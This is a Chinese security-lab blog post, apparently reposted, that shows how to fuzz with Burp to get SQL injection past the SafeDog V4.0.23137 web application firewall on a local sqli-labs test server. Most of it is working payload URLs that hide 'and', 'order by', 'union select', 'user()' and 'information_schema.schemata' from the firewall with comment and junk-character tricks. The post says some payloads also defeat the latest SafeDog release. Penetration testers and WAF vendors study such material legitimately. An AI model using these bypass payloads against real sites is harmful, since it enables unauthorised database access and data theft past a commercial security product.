vlambda博客
学习文章列表

安全狗V4.0.23137 sql注入fuzz绕过

星期五实验室

阅读须知

星期五实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息造成的直接或间接后果和损失,均由使用者本人负责。

星期五实验室拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经授权,不得用于其他。




01

环境搭建


server2012+安全狗+sqli-lab+phpstudy2018

测试链接:

http://10.30.3.209/sqli/Less-2/?id=1 


安全狗V4.0.23137 sql注入fuzz绕过




02

测试过程

安全狗V4.0.23137 sql注入fuzz绕过
内联注释绕过and

测试and被拦截

http://10.30.3.209/sqli/Less-2/?id=1%20and%201=1


安全狗V4.0.23137 sql注入fuzz绕过


burp抓包开始fuzz


安全狗V4.0.23137 sql注入fuzz绕过


经过测试,发现有一些payload可以绕过and


安全狗V4.0.23137 sql注入fuzz绕过


回显正常

http://10.30.3.209/sqli/Less-2/?id=1%20 /*!10442and*/ %201=1

安全狗V4.0.23137 sql注入fuzz绕过


回显异常,存在注入点。

http://10.30.3.209/sqli/Less-2/?id=1%20 /*!10442and*/ %201=2

安全狗V4.0.23137 sql注入fuzz绕过



注释绕过order by
直接输入order by被拦截
http://10.30.3.209/sqli/Less-2/?id=1 order by 1

安全狗V4.0.23137 sql注入fuzz绕过


在order by中间设置变量值

安全狗V4.0.23137 sql注入fuzz绕过


填充一些垃圾字符,垃圾字符可以如下选择。为了减少爆破次数,这里长度设置为4-5,payload数量只有9072,设置1-5爆破的payload会更多。
/-@$&*~^`?

\ 安全狗V4.0.23137 sql注入fuzz绕过


经过fuzz发现有很多payload可以绕过

安全狗V4.0.23137 sql注入fuzz绕过

order by fuzz结果如下


安全狗V4.0.23137 sql注入fuzz绕过


查看第三列回显正常
http://10.30.3.209/sqli/Less-2/?id=1 order/*////*/ by 3

安全狗V4.0.23137 sql注入fuzz绕过


查看第四列出现报错
http://10.30.3.209/sqli/Less-2/?id=1 order/*////*/ by 4

安全狗V4.0.23137 sql注入fuzz绕过



注释绕过union select 
直接输入union select被拦截


安全狗V4.0.23137 sql注入fuzz绕过


在union select中间设置变量值爆破

安全狗V4.0.23137 sql注入fuzz绕过


设置payload数量值范围为4-5,如果爆破不成功可以选择其它范围,比如4-10。

安全狗V4.0.23137 sql注入fuzz绕过


fuzz发现有一些paylaod可以绕过

安全狗V4.0.23137 sql注入fuzz绕过

fuzz结果如下


安全狗V4.0.23137 sql注入fuzz绕过

随便选择一个payload测试
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*/$---*/select%201,2,3http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*/~---*/select%201,2,3http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*/~--@*/select%201,2,3

安全狗V4.0.23137 sql注入fuzz绕过


部分payload会出现报错
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*/`--&*/select%201,2,3

安全狗V4.0.23137 sql注入fuzz绕过


把payload /`--& url编码后放入其中执行正常
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,3

安全狗V4.0.23137 sql注入fuzz绕过



注释绕过敏感命令

这里以user()为例,执行会被拦截
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user()

安全狗V4.0.23137 sql注入fuzz绕过


这里其实用上面那个过union select的paylaod就可以了
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*%2f%60--%26*/()

安全狗V4.0.23137 sql注入fuzz绕过

为了演示还是fuzz一下user(),burp抓包设置变量值

安全狗V4.0.23137 sql注入fuzz绕过


根据需要设置payload的取值范围

安全狗V4.0.23137 sql注入fuzz绕过

返回长度为906的为成功绕过安全狗的payload。

安全狗V4.0.23137 sql注入fuzz绕过

fuzz结果如下


安全狗V4.0.23137 sql注入fuzz绕过


这里例举几个成功绕过的payoad,如果出现报错需要将payload编码,比如/&//需要url编码。
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*/@//*/()http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*/$//*/()http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*%2f%26%2f%2f*/()http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*/~//*/()

安全狗V4.0.23137 sql注入fuzz绕过



fuzz绕过information_schema.schemata
查询数据库会被拦截
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,group_concat(schema_name)%20from%20--+33333%0ainformation_schema./*!schemata*/

安全狗V4.0.23137 sql注入fuzz绕过


在--+和%0a之间添加垃圾字符干扰


安全狗V4.0.23137 sql注入fuzz绕过


fuzz成功跑出一些payload

安全狗V4.0.23137 sql注入fuzz绕过


fuzz结果如下


安全狗V4.0.23137 sql注入fuzz绕过


以下为一些成功绕过的payload
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,group_concat(schema_name)%20from%20--+/*-/%0ainformation_schema./*!schemata*/http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,group_concat(schema_name)%20from%20--+/%*-%0ainformation_schema./*!schemata*/http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,group_concat(schema_name)%20from%20--+/*/*%0ainformation_schema./*!schemata*/

安全狗V4.0.23137 sql注入fuzz绕过

上面的payload也可以绕过最新的安全狗

安全狗V4.0.23137 sql注入fuzz绕过

安全狗V4.0.23137 sql注入fuzz绕过




03

简单总结

安全狗V4.0.23137 sql注入fuzz绕过

使用注释可以绕过and,order by,union select,where等关键词
绕过information_schema.schemata需要换行+单行注释


FRIDAY LAB

星期五实验室成立于2017年,汇集众多技术研究人员,在工业互联网安全前瞻技术研究方向上不断进取。星期五实验室由海内外知名高校的学院精英及来自于顶尖企业的行业专家组成,且大部分人员来自国际领先、国内知名的黑客战队——浙大AAA战队。作为木链科技专业的技术研发团队,星期五实验室凭借精湛的专业技术水平,为产品研发提供新思路、为行业技术革新探索新方向。
安全狗V4.0.23137 sql注入fuzz绕过
安全狗V4.0.23137 sql注入fuzz绕过
安全狗V4.0.23137 sql注入fuzz绕过

星期五实验室
FRIDAY LAB